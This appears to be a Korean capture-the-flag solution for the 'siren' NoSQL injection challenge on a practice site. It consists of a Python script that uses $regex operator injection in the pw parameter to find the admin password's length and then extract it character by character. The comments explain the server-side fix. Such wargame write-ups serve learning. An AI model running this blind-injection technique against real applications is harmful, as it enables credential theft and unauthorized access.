단순한 문제.

아래 사이트 참고

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

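# Certificate verification stays at the requests default (on): every request
# below carries the session cookie, so the TLS peer has to be authenticated.
# urllib3 warnings are no longer suppressed, so a request made with
# verification turned off would be visible in the output.

# Session cookie of the wargame account. It is a credential: keep the
# placeholder in any copy of this script that is shared or committed.
headers = {'Cookie': 'PHPSESSID=###'}

# Plain URL; the markdown autolink brackets must not be part of the string.
base_url = "https://los.rubiya.kr/chall/siren_9e402fc1bc38574071d8369c2c3819ba.php"

# Text the page contains when the submitted condition matched.
HIT_MARKER = "<br><h2>Hello User</h2>"

# Seconds to wait per request, so a stalled connection cannot hang the script.
REQUEST_TIMEOUT = 10

# Upper bound for the length probe, so it cannot keep sending requests forever.
MAX_PW_LEN = 64


def probe(query):
    """Request the challenge page with *query* appended and report a match.

    Why this works as a yes/no oracle: PHP parses a ``pw[$regex]=...`` query
    key into an array, and the page presumably hands that array to its NoSQL
    query as an operator instead of a plain string (server code is not shown
    here -- confirm). The server-side fix is to accept ``pw`` only when it is
    a string, rejecting or casting arrays before the value reaches the query.

    Args:
        query: Query string, including the leading "?".

    Returns:
        True if the response body contains HIT_MARKER, otherwise False.

    Raises:
        requests.HTTPError: on a 4xx/5xx response, so a server error is not
            silently read as "no match".
        requests.RequestException: on connection, TLS or timeout failures.
    """
    res = requests.get(url=base_url + query, headers=headers, timeout=REQUEST_TIMEOUT)
    res.raise_for_status()
    return HIT_MARKER in res.text


#password_length (0 means unknown: measure it with the probe below)
pw_len = 8

if pw_len == 0:
    # ".{n}" is unanchored, so it matches for every n up to the real length.
    # The last n that still matches is the length; stop at the first miss
    # instead of looping without an exit condition.
    for count in range(1, MAX_PW_LEN + 1):
        if not probe("?id=admin&pw[$regex]=.{%d}" % count):
            break
        pw_len = count
        print("pw_len : ", count)

# pw brute force: extend the known prefix by one character per round
charset = "0123456789" + "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
password = ''

for _ in range(pw_len):
    for candidate in charset:
        if probe(f"?id=admin&pw[$regex]=^{password + candidate}.*"):
            password += candidate
            print("password : ", password)
            # Only one character can extend the prefix; skip the rest.
            break
    else:
        # Nothing in charset matched: the next character is outside the
        # alphanumeric set or the oracle stopped answering. Stop here rather
        # than repeat the same failing requests for the remaining rounds.
        break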